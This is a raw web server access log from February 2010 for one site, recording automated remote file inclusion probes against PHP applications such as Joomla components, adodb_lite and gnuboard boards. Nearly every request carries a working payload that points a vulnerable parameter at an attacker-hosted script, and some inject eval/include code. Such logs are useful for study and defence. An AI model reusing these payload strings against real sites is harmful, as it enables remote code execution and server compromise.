85.13.139.254 - - [18/Feb/2010:07:41:31 -0800] "GET /logs/access_100119.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [18/Feb/2010:07:41:31 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:41:47 -0800] "GET /logs/access_100207.log//include/prodler.class.php?sPath=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [18/Feb/2010:07:42:01 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [18/Feb/2010:07:42:01 -0800] "GET /logs/access_100111.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [18/Feb/2010:07:42:01 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [18/Feb/2010:07:42:07 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [18/Feb/2010:07:42:08 -0800] "GET /logs/access_100119.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:42:22 -0800] "GET /logs/access_100119.log//include/prodler.class.php?sPath=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:07:42:35 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:07:42:35 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:07:42:35 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:07:42:41 -0800] "GET /logs/access_100125.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:07:42:47 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:43:22 -0800] "GET /bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:43:22 -0800] "GET /logs//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:43:22 -0800] "GET /logs/access_100206.log%20%20//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:43:23 -0800] "GET /logs/access_100203.log%20%20//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:44:00 -0800] "GET /logs//login.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:44:00 -0800] "GET /login.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:44:00 -0800] "GET /logs/access_100204.log%20%20//login.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:44:05 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:44:05 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:44:06 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:44:06 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:44:06 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:44:06 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:44:12 -0800] "GET /logs/access_100206.log%20%20//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:44:12 -0800] "GET /logs/access_100203.log%20%20//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:44:12 -0800] "GET /bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:44:13 -0800] "GET /logs//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:44:15 -0800] "GET /logs//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:44:15 -0800] "GET /logs/access_100206.log%20%20//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:44:17 -0800] "GET /bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:44:17 -0800] "GET /logs/access_100203.log%20%20//bbs////delete_all.php?board_skin_path=http://www.maesil.co.kr/data/cok/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:44:33 -0800] "GET /logs/access_100111.log%20%20//login.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:44:34 -0800] "GET /logs/access_100119.log//include/prodler.class.php?sPath=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:07:44:47 -0800] "GET /logs/access_100123.log%20%20//?path%5Bdocroot%5D=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:07:44:47 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:07:44:47 -0800] "GET /?path%5Bdocroot%5D=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:44:49 -0800] "GET /logs/access_100123.log//include/prodler.class.php?sPath=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:07:45:57 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:07:45:57 -0800] "GET /logs/access_100123.log//?path%5Bdocroot%5D=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:07:45:58 -0800] "GET /?path%5Bdocroot%5D=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [18/Feb/2010:07:46:39 -0800] "GET /logs/access_100210.log//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [18/Feb/2010:07:46:39 -0800] "GET /logs//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [18/Feb/2010:07:46:39 -0800] "GET /index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:46:48 -0800] "GET /logs/access_100126.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [18/Feb/2010:07:46:55 -0800] "GET /logs/access_100204.log//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:46:59 -0800] "GET /logs/access_100126.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:47:20 -0800] "GET /logs/access_100207.log//include/prodler.class.php?sPath=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:47:46 -0800] "GET /logs/access_100210.log//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:47:46 -0800] "GET /logs//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:47:46 -0800] "GET /index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:48:08 -0800] "GET /logs/access_100205.log//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:48:10 -0800] "GET /write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:48:10 -0800] "GET /logs//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:48:10 -0800] "GET /logs/access_100129.log//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:05 -0800] "GET /logs//index.php?option=com_jce&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:05 -0800] "GET /logs/access_100210.log//index.php?option=com_jce&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:05 -0800] "GET /index.php?option=com_jce&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:15 -0800] "GET /logs/access_100205.log//index.php?option=com_jce&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:24 -0800] "GET /logs//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:24 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:25 -0800] "GET /index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:29 -0800] "GET /logs/access_100210.log//index.php?option=com_jce&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:29 -0800] "GET /index.php?option=com_jce&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:29 -0800] "GET /logs//index.php?option=com_jce&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:30 -0800] "GET /logs//index.php?option=com_jce&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:30 -0800] "GET /index.php?option=com_jce&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:31 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_jce&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:49:39 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:49:39 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:49:39 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:47 -0800] "GET /index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:48 -0800] "GET /logs/access_100210.log//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:48 -0800] "GET /logs//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:49:55 -0800] "GET /logs/access_100204.log%20%20//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:50:06 -0800] "GET /logs/access_100204.log%20%20//index.php?option=com_jce&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:50:07 -0800] "GET /logs/access_100204.log//index.php?option=com_jce&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [18/Feb/2010:07:50:15 -0800] "GET /logs/access_100129.log//?path%5Bdocroot%5D=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [18/Feb/2010:07:50:16 -0800] "GET /logs/access_100204.log//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:50:22 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:50:22 -0800] "GET /components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [18/Feb/2010:07:50:23 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [18/Feb/2010:07:50:30 -0800] "GET /logs/access_100210.log//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [18/Feb/2010:07:50:30 -0800] "GET /logs//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [18/Feb/2010:07:50:30 -0800] "GET /index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:50:34 -0800] "GET /write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:50:34 -0800] "GET /logs//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:50:35 -0800] "GET /logs/access_100129.log%20%20//write_update.php?board_skin_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [18/Feb/2010:07:50:40 -0800] "GET /logs/access_100205.log//index.php?option=com_jce&mosConfig.absolute.path=http://www.snipeground.com/Forum-seduction/styles/serenity/theme/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:07:50:56 -0800] "GET /logs//lib/Loggix/Module/Rss.php?pathToIndex=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:07:50:56 -0800] "GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:07:50:56 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Rss.php?pathToIndex=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:51:05 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:51:05 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:51:05 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:07:51:20 -0800] "GET /write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:07:51:21 -0800] "GET /logs/write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:07:51:22 -0800] "GET /logs/access_100203.log%20%20/write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:51:27 -0800] "GET /logs//administrator/components/com_ezine/config_ezine.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:51:27 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_ezine/config_ezine.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:51:27 -0800] "GET /administrator/components/com_ezine/config_ezine.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:51:28 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_ezine/config_ezine.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:51:28 -0800] "GET /administrator/components/com_ezine/config_ezine.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:51:28 -0800] "GET /logs//administrator/components/com_ezine/config_ezine.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:51:30 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:51:30 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:51:30 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
